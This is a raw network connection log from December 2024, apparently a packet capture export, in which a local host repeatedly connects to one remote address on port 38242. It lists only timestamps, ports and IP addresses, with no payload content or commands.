Dec 27, 2024 09:14:16.576107025 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:16.742624998 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:17.074603081 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:17.074690104 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:17.577634096 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:17.697454929 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:17.697523117 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:17.697559118 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:17.818106890 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:18.201805115 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:18.362768888 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:18.859714985 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:18.859816074 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:19.202913046 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:19.322545052 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:19.322623968 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:19.322669983 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:19.442135096 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:19.834505081 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:19.994777918 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:20.584541082 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:20.584645033 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:20.835664034 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:20.955236912 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:20.955333948 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:20.955404043 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:21.074886084 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:21.461148024 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:21.622658014 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:22.123420954 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:22.123522997 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:22.462050915 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:22.581423998 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:22.581583977 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:22.581747055 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:22.701395988 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:23.085845947 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:23.246712923 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:23.777504921 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:23.777575016 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:24.087061882 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:24.206773043 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:24.206880093 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:24.206949949 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:24.326445103 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:24.437793016 CET	42836	443	192.168.2.23	91.189.91.43
Dec 27, 2024 09:14:24.711298943 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:24.874780893 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:25.401211023 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:25.401285887 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:25.712095022 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:25.832254887 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:25.832334995 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:25.832362890 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:25.951848984 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:26.336466074 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:26.498771906 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:27.010833979 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:27.010929108 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:27.337433100 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:27.456960917 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:27.457077026 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:27.457098007 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:27.576699972 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:27.961097956 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:28.122710943 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:28.622426033 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:28.622498989 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:28.962151051 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:29.081589937 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:29.081665039 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:29.081726074 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:29.201165915 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:29.585493088 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:29.746856928 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:30.268327951 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:30.268419981 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:30.580938101 CET	42516	80	192.168.2.23	109.202.202.202
Dec 27, 2024 09:14:30.586668968 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:30.707010984 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:30.707081079 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:30.707118034 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:30.827574968 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:31.211090088 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:31.370907068 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:31.832748890 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:31.832824945 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:32.212081909 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:32.332381010 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:32.332485914 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:32.332576036 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:32.452078104 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:32.837610006 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:32.998820066 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:33.490320921 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:33.490533113 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:33.838732004 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:33.958246946 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:33.958327055 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:33.958375931 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:34.077857018 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:34.462769985 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:34.622761011 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:35.142919064 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:35.142997980 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:35.463901043 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:35.583575964 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:35.583694935 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:35.583741903 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:35.703282118 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:36.089107990 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:36.250746012 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:36.795536041 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:36.795613050 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:37.091000080 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:37.210658073 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:37.210854053 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:37.210854053 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:37.330513954 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:37.715900898 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:37.878793001 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:38.403014898 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:38.403132915 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:38.717053890 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:38.836759090 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:38.836839914 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:38.836899042 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:38.956502914 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:39.341188908 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:39.559772968 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:40.342341900 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:40.489568949 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:40.489660025 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:40.489726067 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:40.489763975 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:40.489845991 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:40.489859104 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:40.489875078 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:40.610860109 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:40.611326933 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:40.993927956 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:41.154793978 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:41.644048929 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:41.644126892 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:41.995471954 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:42.115400076 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:42.115503073 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:42.115551949 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:42.235073090 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:42.619956970 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:42.783996105 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:43.315947056 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:43.316016912 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:43.624690056 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:43.744395018 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:43.744759083 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:43.744759083 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:43.865400076 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:44.250513077 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:44.410820961 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:44.939579964 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:44.939768076 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:45.251641035 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:45.371165037 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:45.371273994 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:45.371321917 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:45.490890980 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:45.877589941 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:46.038794994 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:46.532499075 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:46.532761097 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:46.879069090 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:46.998949051 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:46.999038935 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:46.999080896 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:47.118613005 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:47.504884958 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:47.666791916 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:48.208410978 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:48.208530903 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:48.506120920 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:48.625792027 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:48.625901937 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:48.626007080 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:48.745398998 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:49.130748034 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:49.290966988 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:49.779334068 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:49.779572964 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:50.132282019 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:50.251934052 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:50.252093077 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:50.252168894 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:50.371711016 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:50.758291006 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:50.918879032 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:51.418210983 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:51.418379068 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:51.759526014 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:51.879151106 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:51.879327059 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:51.879373074 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:51.999022961 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:52.383476019 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:52.546886921 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:53.097552061 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:53.097671986 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:53.105858088 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:14:53.385216951 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:53.504793882 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:53.504905939 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:53.504968882 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:53.624500036 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:54.011368990 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:54.174972057 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:54.696703911 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:54.696830988 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:55.013173103 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:55.132694006 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:55.132843018 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:55.132947922 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:55.252916098 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:55.639148951 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:55.798940897 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:56.329735041 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:56.329873085 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:56.640171051 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:56.760570049 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:56.760678053 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:56.760755062 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:56.880223036 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:57.266911983 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:57.649216890 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:57.669441938 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:57.769006968 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:58.011858940 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:58.011975050 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:58.268270969 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:58.388645887 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:58.388761997 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:58.388842106 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:58.508444071 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:58.894375086 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:59.054959059 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:59.505135059 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:59.505218983 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:59.895780087 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:00.015379906 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:00.015526056 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:00.015615940 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:00.135114908 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:00.520032883 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:00.683866978 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:01.164702892 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:01.164834023 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:01.521286011 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:01.640954018 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:01.641040087 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:01.641143084 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:01.761805058 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:02.145651102 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:02.306957960 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:02.800367117 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:02.800476074 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:03.146683931 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:03.266383886 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:03.266521931 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:03.266567945 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:03.386220932 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:03.771722078 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:04.087068081 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:04.471205950 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:04.471355915 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:04.773379087 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:04.893048048 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:04.893145084 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:04.893239975 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:05.012959957 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:05.400316954 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:05.563040018 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:06.081844091 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:06.081931114 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:06.401591063 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:06.521142006 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:06.521204948 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:06.521255016 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:06.640924931 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:07.025283098 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:07.186969995 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:07.763130903 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:07.763252974 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:08.026768923 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:08.146416903 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:08.146553993 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:08.146634102 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:08.266185999 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:08.651139975 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:08.811022043 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:09.301398993 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:09.301634073 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:09.652681112 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:09.772351980 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:09.772516012 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:09.772604942 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:09.893348932 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:10.278630972 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:10.438993931 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:10.937583923 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:10.937711000 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:11.279941082 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:11.399348974 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:11.399652004 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:11.399759054 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:11.519145012 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:11.905813932 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:12.066917896 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:12.592650890 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:12.592746019 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:12.906894922 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:13.026429892 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:13.026545048 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:13.026576996 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:13.146708012 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:13.531321049 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:13.690956116 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:14.532640934 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:14.652204037 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:14.652333975 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:14.652534962 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:14.772006035 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:15.156686068 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:15.322964907 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:15.846704006 CET	38242	60104	94.156.227.234	192.168.2.23
